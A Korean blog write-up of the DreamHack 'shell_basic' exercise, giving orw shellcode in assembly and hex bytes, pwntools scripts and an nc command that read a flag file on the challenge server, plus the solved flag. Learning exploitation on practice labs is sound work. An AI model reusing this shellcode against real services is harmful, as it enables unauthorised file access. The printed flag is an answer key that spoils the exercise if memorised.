본문 바로가기
DreamHack: System Hacking/F Stage 4

[혼자 실습] shell_basic

Kimteger 2023. 4. 6. 18:02

 

풀이 1

/home/shell_basic/flag_name_is_loooooong

0x676e6f6f6f6f6f6f/6c5f73695f656d61/6e5f67616c662f63/697361625f6c6c65/68732f656d6f682f(->리틀엔디안 /home/shell_basic/flag_name_is_loooooong)


############어셈블리 코드(shell.asm)
BITS 64
section .text
global _start
_start:
push 0x0
mov rax, 0x676e6f6f6f6f6f6f
push rax
mov rax, 0x6c5f73695f656d61
push rax
mov rax, 0x6e5f67616c662f63
push rax
mov rax, 0x697361625f6c6c65
push rax
mov rax, 0x68732f656d6f682f
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall

mov rdi, rax
mov rsi, rsp
sub rsi, 0x30
mov rdx, 0x30
mov rax, 0x0
syscall

mov rdi, 1
mov rax, 0x1
syscall

###################
$nasm -f elf shell.asm
$objdump -d shell.o
$objcopy --dump-section .text=shell.bin shell.o

########쉘 코드
for i in $(objdump -d ./shell.o | grep "^ "|cut -f2);do echo -n \\x$i;done

\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05


########pwntools 코드#####flag.py

from pwn import *
context.arch="amd64"

shell = b'\x6a\x00\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05'

p=remote('host3.dreamhack.games', 18279)
p.sendafter('shellcode: ', shell)

flag=p.recv(1024)
print(flag)


###############
flag == DH{ca562d7cf1db6c55cb11c4ec350a3c0b}

 

풀이 2

풀이1에서 objdump와 objcopy를 통해 shell.bin을 생성한 후

쉘에서 cat shell.bin | nc host port

를 입력하여 flag 획득

 

풀이 3

pwntools 코드를

 

from pwn import *
context.arch='amd64'
context.log_level='debug'

p=remote("호스트",포트)
p.sendafter(":",asm(shellcraft.cat("/home/shell_basic/flag_name_is_loooooong"))) #1) shellcraft.cat()이라는 어셈블리 코드를 2) asm()을 통해 쉘코드로 변환시키고, 3) 이를 ":"이 나타나면 입력시킨다 
p.interactive()

 

 

와 같이 짠 후 이 py파일을 실행시킨다

'DreamHack: System Hacking > F Stage 4' 카테고리의 다른 글

Exploit Tech: Shellcode  (0) 2023.04.06

'DreamHack: System Hacking/F Stage 4' Related Articles

티스토리툴바